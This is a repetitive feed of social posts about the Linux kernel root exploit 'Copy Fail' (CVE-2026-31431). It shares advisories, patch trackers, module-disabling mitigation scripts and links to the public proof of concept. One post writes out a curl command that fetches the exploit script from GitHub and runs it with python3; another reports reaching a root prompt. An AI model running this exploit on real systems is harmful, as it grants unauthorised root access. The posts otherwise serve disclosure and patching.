Copy Fail — CVE-2026-31431

https://copy.fail/

Copy-fail-destroyer: K8s remediation for CVE-2026-31431

https://github.com/NorskHelsenett/copy-fail-destroyer

#github #k8s

@yuka Debian is uncomfortably slow pushing the fix.
https://security-tracker.debian.org/tracker/CVE-2026-31431

Toch altijd wel knap wat hackers weten te vinden.

'Most Linux LPEs need a race window or a kernel-specific offset. Copy Fail is a straight-line logic flaw — it needs neither. The same 732-byte Python script roots every Linux distribution shipped since 2017.'

"Copy Fail — CVE-2026-31431"

https://copy.fail/

Copy Fail: Linux Kernel Flaw Grants Root Access On All Major Distributions

A Linux kernel vulnerability called "Copy Fail" (CVE-2026-31431) allows unprivileged local users to gain root privileges with 100% reliability by corrupting the shared page cache. The flaw affects nearly all Linux distributions since 2017 and enables container escapes because the memory corruption does not modify files on disk.

**If you run Linux servers, especially shared environments like Kubernetes clusters, CI/CD runners, or multi-tenant hosts, patch your kernel immediately to a version that includes the fix (mainline commit a664bf3d603d) for CVE-2026-31431. If you can't patch right away, disable the vulnerable module by running echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf followed by rmmod algif_aead, and for untrusted code environments block AF_ALG socket creation via seccomp as a long-term safeguard.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/copy-fail-linux-kernel-flaw-grants-root-access-on-all-major-distributions-w-l-v-0-c/gD2P6Ple2L

Copy Fail (CVE-2026-31431): 732 bajty do przejęcia kontroli nad systemem ( https://nfsec.pl/security/6718 ) #linux #kernel #exploit

https://www.youtube.com/watch?v=-RuJTJga2fU

PSA for sysadmins: https://master.almalinux-org.pages.dev/blog/2026-04-30-cve-2026-31431-copy-fail/

TL;DR anyone with an unpriviledged shell can become root with a small exploit. One mean fucker, so be sure to update ASAP once available if you're within blast radius.

#sysadmin #Linux #psa #cve

Oops.

„If your kernel was built between 2017 and the patch — which covers essentially every mainstream Linux distribution — you're in scope.“

Copy Fail — CVE-2026-31431 https://copy.fail/
#BadNews

📢 CVE-2026-31431 ' Copy Fail ' : escalade de privilèges root en 732 octets sur toutes les distributions Linux majeures
📝 ## 🔍 Contexte

Publié le 29 avril 2026 sur le blog de Xint (xint.io), cet article est une...
📖 cyberveille : https://cyberveille.ch/posts/2026-04-30-cve-2026-31431-copy-fail-escalade-de-privileges-root-en-732-octets-sur-toutes-les-distributions-linux-majeures/
🌐 source : https://xint.io/blog/copy-fail-linux-distributions
#AF_ALG #CVE_2016_5195 #Cyberveille

[VULN] ⚠️"Copy Fail - Une IA trouve la faille Linux que personne n'a vue"
" * Copy Fail (CVE-2026-31431) est une faille Linux qui permet de passer de simple utilisateur à root en 732 octets, affectant la quasi-totalité des kernels non patchés depuis 2017, découverte par une IA en une heure.

• La faille exploite une optimisation de 2017 dans le sous-système crypto qui laisse un fichier en lecture seule accessible en zone modifiable, permettant de modifier progressivement un binaire système via l'appel splice().
• Deux solutions de protection existent : patcher le kernel via la distro ou désactiver le module algif_aead (ou bloquer le sous-système crypto via seccomp si le module est intégré en dur)."👇 https://korben.info/copy-fail-faille-kernel-linux-decouverte-ia.html

Demo / exploit ( via @bortzmeyer )
👇
https://www.bortzmeyer.org/copyfail.html

🔍
⬇️
https://vulnerability.circl.lu/vuln/CVE-2026-31431

💬
⬇️
https://infosec.pub/post/45735124

#CyberVeille #CVE_2026_31431

So, copy.fail was found with one hour of AI assistance, and would (according to this article) have earned $500K on the open market not too long ago.

https://www.bugcrowd.com/blog/what-we-know-about-copy-fail-cve-2026-31431/

I'm no security researcher, but this kind of contradicts all those people who said that the OpenBSD bug that Mythos found (for $20K of compute) was just fancy fuzzing, and the only reason it was there was that nobody was investing 20K in OpenBSD security and the security threat of modern AI was all hype.

so what do I even do at this point. the patch for CVE-2026-31431 isn't out yet on debian stable and the only fixes I see are to recompile the kernel which I have zero idea how to do

Blip blop, I'm a #mastobot.
Here is a summary (in beta) of the latest posts in #programmingAtKukei https://masto.kukei.eu/browse/programming category:
- **AI coding tools and controversies**: Discussions on Claude Code deleting databases, GitHub Copilot’s usage-based billing, and AI-generated code ownership debates.
- **GitHub reliability and alternatives**: Criticism of GitHub’s frequent outages, security vulnerabilities (e.g., CVE-2026-31431, CVE-2026-3854), and migrations to alternatives like [1/3]

Blip blop, I'm a #mastobot.
Here is a summary (in beta) of the latest posts in #technologyAtKukei https://masto.kukei.eu/browse/technology category:
- **AI and LLM Developments & Controversies**: Discussions on AI solving mathematical problems (Erdős problem), AI-generated content issues (goblins in OpenAI Codex), AI agents causing data loss (Claude deleting databases), and AI ethics concerns (biological weapons, copyright infringement).
- **Linux Security Vulnerability (CVE-2026-31431)**: A [1/3]

@chuso Probably worth mentioning the related bug on #Gentoo Bugzilla.

https://bugs.gentoo.org/show_bug.cgi?id=CVE-2026-31431

Looks like @thesamesam is well and truly onto it.

Also for #Debian users, at the moment they're working on fixes: https://security-tracker.debian.org/tracker/CVE-2026-31431

Edit: Nothing seen on the #AlpineLinux front, I guess we'll hear from @alpinelinux in due course.

むー？まずいか？
Linuxカーネルの脆弱性「CopyFail (CVE-2026-31431)」をEC2のUbuntu 22.04で実証してみた https://zenn.dev/aeyesec/articles/7e4a1e3c83e81b

I can confirm this report where Copyfail fails.

https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/19

#Debian #Copyfail

Copy Fail (https://copy.fail/, CVE-2026-31431) is a good reminder why I don’t want to run CI jobs only in containers.

It would be great to get some momentum to https://code.forgejo.org/forgejo/forgejo-actions-feature-requests/issues/4 (microVMs for forgejo actions). At least on bare metal (or nested VMs with nested KVM) this would make things a lot safer. It would also simplify the usage of containers/docker in CI jobs without compromising security, which is kind of a pain with Codeberg Action currently.

#security

@giggls Verdammt, ja. Das ist die richtige ID:
https://euvd.enisa.europa.eu/vulnerability/CVE-2026-31431

Die Bezeichnungen bei den Europäern sind irritierend. Warum müssen die eigene Nummern vergeben?
"EUVD-2026-24639"

@fooflington ich bins grade.
https://security-tracker.debian.org/tracker/CVE-2026-31431
Einfach mal nen poc (nicht überprüft) raushauen ohne responsible disclosure fürn maximalen fame um den eigenen KI scanner zu promoten.

@fanf42 → lets an unprivileged local user write into the page cache and obtain root
CVE-2026-31431, no score yet at NIST

#linux #kernel #exploit - I completely missed this one:

https://www.bugcrowd.com/blog/what-we-know-about-copy-fail-cve-2026-31431/

Privilege escalation on all linux kernels since 2017. And I cannot even see if my current ubuntu kernel has a patch for it...

Gotta sign up on some more security accounts here!

A mitigation that worked for me - https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/26

Linux Kernel “Copy Fail” Zero-Day Exposes Millions of Systems to Instant Root Access

Introduction A newly disclosed Linux kernel vulnerability is raising serious alarms across the cybersecurity world. Tracked as CVE-2026-31431 and nicknamed Copy Fail, the flaw allows any unprivileged local user to gain full root access on many Linux systems released since 2017. Security researchers say the exploit is unusually simple, reliable, and dangerous, requiring only a short…

https://undercodenews.com/linux-kernel-copy-fail-zero-day-exposes-millions-of-systems-to-instant-root-access/?utm_source=mastodon&utm_medium=jetpack_social

CVE-2026-31431 #copyfail Tetragon Tracing Policy - Kill unprivileged aead_recvmsg. This is the low-level customization of configuration policies your #Linux EDR should have. Also, watch out for processes running NULL argv https://gist.github.com/cr0nx/3079c57310f01ad89699bda642e0e37e

『Copy Fail：2017年至今的漏洞，一个脚本获得 Linux root 管理员权限｜CVE-2026-31431』
只需要10行代码，就能获得自2017年至今大多数 Linux 发行版本的 root 权限。史称 Copy Fail，漏洞编号 CVE-2026-31431 先看提权演示视频 演示代码 代码来
……
阅读全文： :sys_link: https://www.appinn.com/copy-fail-cve-2026-31431/

#小众软件

Joker voice: Just wait 'til malicious agents and oberly aggressive users get a load of CVE-2026-31431

So... came home to a proverbial tire fire. CVE-2026-31431

Yay. I am bold and DGAF so I made the call to shut off all login access (a call backed up by my peers shortly after).

Users who don't check their mail, look at status, or check our websites will be sending in 'URGENT' tickets any minute now.

Very unfortunate that the fix for CVE-2026-31431 isn't easily backportable, with a new API being added, and then its implementation details changing, since the last LTS (6.12 vs 6.18).

Copy Fail – CVE-2026-31431: https://copy.fail/

Discussion: http://news.ycombinator.com/item?id=47952181

Copy Fail – CVE-2026-31431

Link: https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181

@marshray doesn't work on vaguely recent F44 kernel for me.

[adamw@omnibook ~]$ curl -o /tmp/test.py https://raw.githubusercontent.com/theori-io/copy-fail-CVE-2026-31431/refs/heads/main/copy_fail_exp.py
[adamw@omnibook ~]$ python3 /tmp/test.py
Password:
su: Authentication failure
[adamw@omnibook ~]$ uname -r
6.19.13-300.fc44.x86_64

Copy Fail – CVE-2026-31431
https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181

CVE-2026-31431 is a Linux LPE, PoC script roots every distribution shipped since 2017 https://copy.fail/

This is bad…
---
CVE-2026-31431. 100% Reliable Linux LPE — no race, no per-distro offsets, page-cache write that bypasses on-disk file-integrity tools and crosses containers. Found by Xint Code.

https://copy.fail/

This is what I'm pasting into my own linux systems to implement the mitigation #cve_2026_31431 suggested at the #copyfail website.
It may not be right for you. The 'chattr +i' may make it more difficult to undo!
MIT license, or at least its disclaimers, apply.

f=disable-algif_aead-CVE-2026-31431.conf
if ! [ -d /etc/modprobe.d ]; then
printf 'This system does not seem to have a /etc/modprobe.d dir, so this script would need to be adapted.\n' >&2
return 74
else
sudo /bin/env -i /bin/sh -c 'set -x;set -e;cd /etc/modprobe.d;umask 133;printf '\''install algif_aead /bin/false\n'\'' >'"$f"';chattr +i '"$f"
fi
sudo /bin/env -i /bin/sh -c '(set -x;rmmod -v algif_aead)2>&1|grep -v "is not currently loaded"'
ls -l /etc/modprobe.d/$f
cat -t /etc/modprobe.d/$f

🚨 CVE-2026-31431 (Copy Fail)

In the Linux kernel, the following vulnerability has been resolved:

crypto: algif_aead - Revert to operating out-of-place

This mostly reverts commit 72548b093ee3 except for the copying of the associated data.

There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just copy the AD directly.

ℹ️ Additional info on ZEN SecDB https://secdb.nttzen.cloud/cve/detail/CVE-2026-31431

#nttdata #zen #secdb #infosec
#copyfail #cve202631431 #linux #kernel

https://security-tracker.debian.org/tracker/CVE-2026-31431

@krypt3ia @Viss https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py

Copy Fail — CVE-2026-31431 Linux Privilege Escalation https://copy.fail/

Copy Fail – CVE-2026-31431: https://copy.fail/

Discussion: http://news.ycombinator.com/item?id=47952181

Copy Fail – CVE-2026-31431 https://copy.fail/

Wir checken Eure Linux-Distro! Kommt beim nächsten #DiDay mit euren abgehangenen 5-er Kerneln vorbei und wir halten Händchen, während wir gemeinsam exploit.py von CVE-2026-31431 ausführen.

https://security-tracker.debian.org/tracker/CVE-2026-31431

https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py

Copy Fail – CVE-2026-31431: https://copy.fail/

Discussion: http://news.ycombinator.com/item?id=47952181

Copy Fail – CVE-2026-31431

Link: https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181

Hello

I am here to ruin your day again

https://copy.fail/ / CVE-2026-31431

Seems RHEL don't think this is all that important, CloudLinux's kernel image (presumably derived from RHEL) has the problem module built in, so you can't even mitigate while we wait for patching. CageFS does help as - afaict - no setuid binaries are included in the default cagefs env. Many Debian versions lack a patch at time of writing, but blocking the module did work for me.

#infosec #linux #vulnerability

@mttaggart

Editing to add:

RHEL has now updated the severity and the fix is no longer "deferred" for all affected OSes.

Looks like it requires a local user account, with a password set, to exploit, yes?

https://access.redhat.com/security/cve/cve-2026-31431

RE: https://hachyderm.io/@petrillic/116489574280084326

I have had a confirmation that it can work on the Amazon Linux kernel, but also RHEL says "fix deferred" for all affected RHEL versions: https://access.redhat.com/security/cve/cve-2026-31431

Copy Fail – CVE-2026-31431: https://copy.fail/

Discussion: http://news.ycombinator.com/item?id=47952181

I’m a bit surprised they did not wait till a patch was available for the major distros. Smells like an IPO or the next round of funding is coming soon.

You probably want to keep a close eye on any system you maintain where unprivileged users have shell access and update as soon as possible.

https://copy.fail

https://security-tracker.debian.org/tracker/CVE-2026-31431

https://ubuntu.com/security/CVE-2026-31431

https://www.suse.com/security/cve/CVE-2026-31431.html

#copyfail

Copy Fail — CVE-2026-31431

https://copy.fail/

Copy-fail-destroyer: K8s remediation for CVE-2026-31431

https://github.com/NorskHelsenett/copy-fail-destroyer

#github #k8s

@yuka Debian is uncomfortably slow pushing the fix.
https://security-tracker.debian.org/tracker/CVE-2026-31431

Toch altijd wel knap wat hackers weten te vinden.

'Most Linux LPEs need a race window or a kernel-specific offset. Copy Fail is a straight-line logic flaw — it needs neither. The same 732-byte Python script roots every Linux distribution shipped since 2017.'

"Copy Fail — CVE-2026-31431"

https://copy.fail/

Copy Fail: Linux Kernel Flaw Grants Root Access On All Major Distributions

A Linux kernel vulnerability called "Copy Fail" (CVE-2026-31431) allows unprivileged local users to gain root privileges with 100% reliability by corrupting the shared page cache. The flaw affects nearly all Linux distributions since 2017 and enables container escapes because the memory corruption does not modify files on disk.

**If you run Linux servers, especially shared environments like Kubernetes clusters, CI/CD runners, or multi-tenant hosts, patch your kernel immediately to a version that includes the fix (mainline commit a664bf3d603d) for CVE-2026-31431. If you can't patch right away, disable the vulnerable module by running echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf followed by rmmod algif_aead, and for untrusted code environments block AF_ALG socket creation via seccomp as a long-term safeguard.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/copy-fail-linux-kernel-flaw-grants-root-access-on-all-major-distributions-w-l-v-0-c/gD2P6Ple2L

Copy Fail (CVE-2026-31431): 732 bajty do przejęcia kontroli nad systemem ( https://nfsec.pl/security/6718 ) #linux #kernel #exploit

https://www.youtube.com/watch?v=-RuJTJga2fU

PSA for sysadmins: https://master.almalinux-org.pages.dev/blog/2026-04-30-cve-2026-31431-copy-fail/

TL;DR anyone with an unpriviledged shell can become root with a small exploit. One mean fucker, so be sure to update ASAP once available if you're within blast radius.

#sysadmin #Linux #psa #cve

Oops.

„If your kernel was built between 2017 and the patch — which covers essentially every mainstream Linux distribution — you're in scope.“

Copy Fail — CVE-2026-31431 https://copy.fail/
#BadNews

[VULN] ⚠️"Copy Fail - Une IA trouve la faille Linux que personne n'a vue"
" * Copy Fail (CVE-2026-31431) est une faille Linux qui permet de passer de simple utilisateur à root en 732 octets, affectant la quasi-totalité des kernels non patchés depuis 2017, découverte par une IA en une heure.

• La faille exploite une optimisation de 2017 dans le sous-système crypto qui laisse un fichier en lecture seule accessible en zone modifiable, permettant de modifier progressivement un binaire système via l'appel splice().
• Deux solutions de protection existent : patcher le kernel via la distro ou désactiver le module algif_aead (ou bloquer le sous-système crypto via seccomp si le module est intégré en dur)."👇 https://korben.info/copy-fail-faille-kernel-linux-decouverte-ia.html

Demo / exploit ( via @bortzmeyer )
👇
https://www.bortzmeyer.org/copyfail.html

🔍
⬇️
https://vulnerability.circl.lu/vuln/CVE-2026-31431

💬
⬇️
https://infosec.pub/post/45735124

#CyberVeille #CVE_2026_31431

So, copy.fail was found with one hour of AI assistance, and would (according to this article) have earned $500K on the open market not too long ago.

https://www.bugcrowd.com/blog/what-we-know-about-copy-fail-cve-2026-31431/

I'm no security researcher, but this kind of contradicts all those people who said that the OpenBSD bug that Mythos found (for $20K of compute) was just fancy fuzzing, and the only reason it was there was that nobody was investing 20K in OpenBSD security and the security threat of modern AI was all hype.

@chuso Probably worth mentioning the related bug on #Gentoo Bugzilla.

https://bugs.gentoo.org/show_bug.cgi?id=CVE-2026-31431

Looks like @thesamesam is well and truly onto it.

Also for #Debian users, at the moment they're working on fixes: https://security-tracker.debian.org/tracker/CVE-2026-31431

Edit: Nothing seen on the #AlpineLinux front, I guess we'll hear from @alpinelinux in due course.

I can confirm this report where Copyfail fails.

https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/19

#Debian #Copyfail

Copy Fail (https://copy.fail/, CVE-2026-31431) is a good reminder why I don’t want to run CI jobs only in containers.

It would be great to get some momentum to https://code.forgejo.org/forgejo/forgejo-actions-feature-requests/issues/4 (microVMs for forgejo actions). At least on bare metal (or nested VMs with nested KVM) this would make things a lot safer. It would also simplify the usage of containers/docker in CI jobs without compromising security, which is kind of a pain with Codeberg Action currently.

#security

@giggls Verdammt, ja. Das ist die richtige ID:
https://euvd.enisa.europa.eu/vulnerability/CVE-2026-31431

Die Bezeichnungen bei den Europäern sind irritierend. Warum müssen die eigene Nummern vergeben?
"EUVD-2026-24639"

@fooflington ich bins grade.
https://security-tracker.debian.org/tracker/CVE-2026-31431
Einfach mal nen poc (nicht überprüft) raushauen ohne responsible disclosure fürn maximalen fame um den eigenen KI scanner zu promoten.

@fanf42 → lets an unprivileged local user write into the page cache and obtain root
CVE-2026-31431, no score yet at NIST

#linux #kernel #exploit - I completely missed this one:

https://www.bugcrowd.com/blog/what-we-know-about-copy-fail-cve-2026-31431/

Privilege escalation on all linux kernels since 2017. And I cannot even see if my current ubuntu kernel has a patch for it...

Gotta sign up on some more security accounts here!

A mitigation that worked for me - https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/26

Joker voice: Just wait 'til malicious agents and oberly aggressive users get a load of CVE-2026-31431

So... came home to a proverbial tire fire. CVE-2026-31431

Yay. I am bold and DGAF so I made the call to shut off all login access (a call backed up by my peers shortly after).

Users who don't check their mail, look at status, or check our websites will be sending in 'URGENT' tickets any minute now.

CopyFail results:

On Debian 12 (6.1.158 kernel) PoC didn't seem to work, I got prompted for a password.

On Debian 14 (6.18.5 kernel) got dropped right into a root prompt.

So this is very real. Yikes.

Proof of concept: https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py

Write up: https://discourse.ifin.network/t/copy-fail-732-bytes-to-root-on-every-major-linux-distributions/342

Very unfortunate that the fix for CVE-2026-31431 isn't easily backportable, with a new API being added, and then its implementation details changing, since the last LTS (6.12 vs 6.18).

Copy Fail – CVE-2026-31431

Link: https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181

@marshray doesn't work on vaguely recent F44 kernel for me.

[adamw@omnibook ~]$ curl -o /tmp/test.py https://raw.githubusercontent.com/theori-io/copy-fail-CVE-2026-31431/refs/heads/main/copy_fail_exp.py
[adamw@omnibook ~]$ python3 /tmp/test.py
Password:
su: Authentication failure
[adamw@omnibook ~]$ uname -r
6.19.13-300.fc44.x86_64

全てのディストリで影響があるゼロデイの脆弱性が見つかったそうです。特権昇格が可能です。 Copy Fail — CVE-2026-31431 copy.fail

Copy Fail — 732 Bytes to Root

Copy Fail – CVE-2026-31431
https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181

CVE-2026-31431 is a Linux LPE, PoC script roots every distribution shipped since 2017 https://copy.fail/

This is bad…
---
CVE-2026-31431. 100% Reliable Linux LPE — no race, no per-distro offsets, page-cache write that bypasses on-disk file-integrity tools and crosses containers. Found by Xint Code.

https://copy.fail/

This is what I'm pasting into my own linux systems to implement the mitigation #cve_2026_31431 suggested at the #copyfail website.
It may not be right for you. The 'chattr +i' may make it more difficult to undo!
MIT license, or at least its disclaimers, apply.

f=disable-algif_aead-CVE-2026-31431.conf
if ! [ -d /etc/modprobe.d ]; then
printf 'This system does not seem to have a /etc/modprobe.d dir, so this script would need to be adapted.\n' >&2
return 74
else
sudo /bin/env -i /bin/sh -c 'set -x;set -e;cd /etc/modprobe.d;umask 133;printf '\''install algif_aead /bin/false\n'\'' >'"$f"';chattr +i '"$f"
fi
sudo /bin/env -i /bin/sh -c '(set -x;rmmod -v algif_aead)2>&1|grep -v "is not currently loaded"'
ls -l /etc/modprobe.d/$f
cat -t /etc/modprobe.d/$f

🚨 CVE-2026-31431 (Copy Fail)

In the Linux kernel, the following vulnerability has been resolved:

crypto: algif_aead - Revert to operating out-of-place

This mostly reverts commit 72548b093ee3 except for the copying of the associated data.

There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just copy the AD directly.

ℹ️ Additional info on ZEN SecDB https://secdb.nttzen.cloud/cve/detail/CVE-2026-31431

#nttdata #zen #secdb #infosec
#copyfail #cve202631431 #linux #kernel

https://security-tracker.debian.org/tracker/CVE-2026-31431

@krypt3ia @Viss https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py

Copy Fail — CVE-2026-31431 Linux Privilege Escalation https://copy.fail/

Wir checken Eure Linux-Distro! Kommt beim nächsten #DiDay mit euren abgehangenen 5-er Kerneln vorbei und wir halten Händchen, während wir gemeinsam exploit.py von CVE-2026-31431 ausführen.

https://security-tracker.debian.org/tracker/CVE-2026-31431

https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py

Copy Fail – CVE-2026-31431

Link: https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181

Hello

I am here to ruin your day again

https://copy.fail/ / CVE-2026-31431

Seems RHEL don't think this is all that important, CloudLinux's kernel image (presumably derived from RHEL) has the problem module built in, so you can't even mitigate while we wait for patching. CageFS does help as - afaict - no setuid binaries are included in the default cagefs env. Many Debian versions lack a patch at time of writing, but blocking the module did work for me.

#infosec #linux #vulnerability

@mttaggart

Editing to add:

RHEL has now updated the severity and the fix is no longer "deferred" for all affected OSes.

Looks like it requires a local user account, with a password set, to exploit, yes?

https://access.redhat.com/security/cve/cve-2026-31431

RE: https://hachyderm.io/@petrillic/116489574280084326

I have had a confirmation that it can work on the Amazon Linux kernel, but also RHEL says "fix deferred" for all affected RHEL versions: https://access.redhat.com/security/cve/cve-2026-31431

I’m a bit surprised they did not wait till a patch was available for the major distros. Smells like an IPO or the next round of funding is coming soon.

You probably want to keep a close eye on any system you maintain where unprivileged users have shell access and update as soon as possible.

https://copy.fail

https://security-tracker.debian.org/tracker/CVE-2026-31431

https://ubuntu.com/security/CVE-2026-31431

https://www.suse.com/security/cve/CVE-2026-31431.html

#copyfail

Ooooh, nice:

https://xint.io/blog/copy-fail-linux-distributions

CVE-2026-31431: Local privilege escalation to root using a trivial 732 byte python script for pretty much every Linux distribution since 2017.

#CopyFail

Copy Fail – CVE-2026-31431
https://news.ycombinator.com/item?id=47952181

#hackernews #tech

Hm https://security-tracker.debian.org/tracker/CVE-2026-31431

Copy Fail – CVE-2026-31431

Link: https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181

Copy Fail – CVE-2026-31431
Link: https://copy.fail/
Comments: https://news.ycombinator.com/item?id=47952181

Copy Fail – CVE-2026-31431

Link: https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181

Copy Fail – CVE-2026-31431

https://copy.fail/

#HackerNews #CopyFail #CVE2026 #Security #Vulnerability #HackerNews #TechNews

4/

Three CVEs credited to Joshua Rogers of AISLE Research Team:

― CVE-2026-39457 <https://www.cve.org/CVERecord?id=CVE-2026-39457> FreeBSD-SA-26:16.libnv <https://security.freebsd.org/advisories/FreeBSD-SA-26:16.libnv.asc>

― CVE-2026-42511 <https://www.cve.org/CVERecord?id=CVE-2026-42511> FreeBSD-SA-26:12.dhclient <https://security.freebsd.org/advisories/FreeBSD-SA-26:12.dhclient.asc>

― CVE-2026-42512 <https://www.cve.org/CVERecord?id=CVE-2026-42512> FreeBSD-SA-26:15.dhclient <https://security.freebsd.org/advisories/FreeBSD-SA-26:15.dhclient.asc>

<https://aisle.com/about-us>

4/

Three CVEs credited to Joshua Rogers of AISLE Research Team:

― CVE-2026-39457 <https://www.cve.org/CVERecord?id=CVE-2026-39457> FreeBSD-SA-26:16.libnv <https://security.freebsd.org/advisories/FreeBSD-SA-26:16.libnv.asc>

― CVE-2026-42511 <https://www.cve.org/CVERecord?id=CVE-2026-42511> FreeBSD-SA-26:12.dhclient <https://security.freebsd.org/advisories/FreeBSD-SA-26:12.dhclient.asc>

― CVE-2026-42512 <https://www.cve.org/CVERecord?id=CVE-2026-42512> FreeBSD-SA-26:15.dhclient <https://security.freebsd.org/advisories/FreeBSD-SA-26:15.dhclient.asc>

<https://aisle.com/about-us>

RE: https://mastodon.bsd.cafe/@grahamperrin/116475400039936346

3/

CVE-2026-7270 <https://www.cve.org/CVERecord?id=CVE-2026-7270> FreeBSD-SA-26:13.exec <https://security.freebsd.org/advisories/FreeBSD-SA-26:13.exec.asc> credited to Ryan of Calif.io.

Calif is recently known for post-CVE attention to an earlier CVE, <https://blog.calif.io/p/mad-bugs-claude-wrote-a-full-freebsd>. This work by Calif was wrongly attributed to Nicholas Carlini (an error by Devansh in 'Artificial Intelligence Made Simple').

RE: https://mastodon.bsd.cafe/@grahamperrin/116475400039936346

3/

CVE-2026-7270 <https://www.cve.org/CVERecord?id=CVE-2026-7270> FreeBSD-SA-26:13.exec <https://security.freebsd.org/advisories/FreeBSD-SA-26:13.exec.asc> credited to Ryan of Calif.io.

Calif is recently known for post-CVE attention to an earlier CVE, <https://blog.calif.io/p/mad-bugs-claude-wrote-a-full-freebsd>. This work by Calif was wrongly attributed to Nicholas Carlini (an error by Devansh in 'Artificial Intelligence Made Simple').

2/

CVE-2026-7164 <https://www.cve.org/CVERecord?id=CVE-2026-7164> FreeBSD-SA-26:14.pf <https://security.freebsd.org/advisories/FreeBSD-SA-26:14.pf.asc> credited to Igor Gabriel Sousa e Souza.

I can't easily find any information about this person.

2/

CVE-2026-7164 <https://www.cve.org/CVERecord?id=CVE-2026-7164> FreeBSD-SA-26:14.pf <https://security.freebsd.org/advisories/FreeBSD-SA-26:14.pf.asc> credited to Igor Gabriel Sousa e Souza.

I can't easily find any information about this person.

⚠️ CVE-2026-5402: HIGH severity heap buffer overflow in Wireshark 4.6.0 – 4.6.4 TLS dissector. Exploitation can lead to DoS or code execution. No patch yet — avoid untrusted TLS traffic. https://radar.offseq.com/threat/cve-2026-5402-cwe-122-heap-based-buffer-overflow-i-bdf27e3b #OffSeq #Wireshark #CVE20265402 #BlueTeam

⚠️ CVE-2026-5402: HIGH severity heap buffer overflow in Wireshark 4.6.0 – 4.6.4 TLS dissector. Exploitation can lead to DoS or code execution. No patch yet — avoid untrusted TLS traffic. https://radar.offseq.com/threat/cve-2026-5402-cwe-122-heap-based-buffer-overflow-i-bdf27e3b #OffSeq #Wireshark #CVE20265402 #BlueTeam

4/

Three CVEs credited to Joshua Rogers of AISLE Research Team:

― CVE-2026-39457 <https://www.cve.org/CVERecord?id=CVE-2026-39457> FreeBSD-SA-26:16.libnv <https://security.freebsd.org/advisories/FreeBSD-SA-26:16.libnv.asc>

― CVE-2026-42511 <https://www.cve.org/CVERecord?id=CVE-2026-42511> FreeBSD-SA-26:12.dhclient <https://security.freebsd.org/advisories/FreeBSD-SA-26:12.dhclient.asc>

― CVE-2026-42512 <https://www.cve.org/CVERecord?id=CVE-2026-42512> FreeBSD-SA-26:15.dhclient <https://security.freebsd.org/advisories/FreeBSD-SA-26:15.dhclient.asc>

<https://aisle.com/about-us>

4/

Three CVEs credited to Joshua Rogers of AISLE Research Team:

― CVE-2026-39457 <https://www.cve.org/CVERecord?id=CVE-2026-39457> FreeBSD-SA-26:16.libnv <https://security.freebsd.org/advisories/FreeBSD-SA-26:16.libnv.asc>

― CVE-2026-42511 <https://www.cve.org/CVERecord?id=CVE-2026-42511> FreeBSD-SA-26:12.dhclient <https://security.freebsd.org/advisories/FreeBSD-SA-26:12.dhclient.asc>

― CVE-2026-42512 <https://www.cve.org/CVERecord?id=CVE-2026-42512> FreeBSD-SA-26:15.dhclient <https://security.freebsd.org/advisories/FreeBSD-SA-26:15.dhclient.asc>

<https://aisle.com/about-us>

4/

Three CVEs credited to Joshua Rogers of AISLE Research Team:

― CVE-2026-39457 <https://www.cve.org/CVERecord?id=CVE-2026-39457> FreeBSD-SA-26:16.libnv <https://security.freebsd.org/advisories/FreeBSD-SA-26:16.libnv.asc>

― CVE-2026-42511 <https://www.cve.org/CVERecord?id=CVE-2026-42511> FreeBSD-SA-26:12.dhclient <https://security.freebsd.org/advisories/FreeBSD-SA-26:12.dhclient.asc>

― CVE-2026-42512 <https://www.cve.org/CVERecord?id=CVE-2026-42512> FreeBSD-SA-26:15.dhclient <https://security.freebsd.org/advisories/FreeBSD-SA-26:15.dhclient.asc>

<https://aisle.com/about-us>

4/

Three CVEs credited to Joshua Rogers of AISLE Research Team:

― CVE-2026-39457 <https://www.cve.org/CVERecord?id=CVE-2026-39457> FreeBSD-SA-26:16.libnv <https://security.freebsd.org/advisories/FreeBSD-SA-26:16.libnv.asc>

― CVE-2026-42511 <https://www.cve.org/CVERecord?id=CVE-2026-42511> FreeBSD-SA-26:12.dhclient <https://security.freebsd.org/advisories/FreeBSD-SA-26:12.dhclient.asc>

― CVE-2026-42512 <https://www.cve.org/CVERecord?id=CVE-2026-42512> FreeBSD-SA-26:15.dhclient <https://security.freebsd.org/advisories/FreeBSD-SA-26:15.dhclient.asc>

<https://aisle.com/about-us>

@thesaigoneer thanks!

Looking at the various credits …

1/

CVE-2026-35547 <https://www.cve.org/CVERecord?id=CVE-2026-35547> FreeBSD-SA-26:17.libnv <https://security.freebsd.org/advisories/FreeBSD-SA-26:17.libnv.asc> credited to Mariusz Zaborski.

<https://papers.freebsd.org/author/mariusz-zaborski/> is currently empty (<https://github.com/freebsd/freebsd-papers/issues/152> relates), should probably comprise:

<https://papers.freebsd.org/2016/asiabsdcon/oshogbo-capsicum_and_casper/>

<https://papers.freebsd.org/2019/bsdcan/zaborski-building_a_security_appliance_based_on_freebsd/>

Cc @jloc0 @ascreen @garyhtech

@thesaigoneer thanks!

Looking at the various credits …

1/

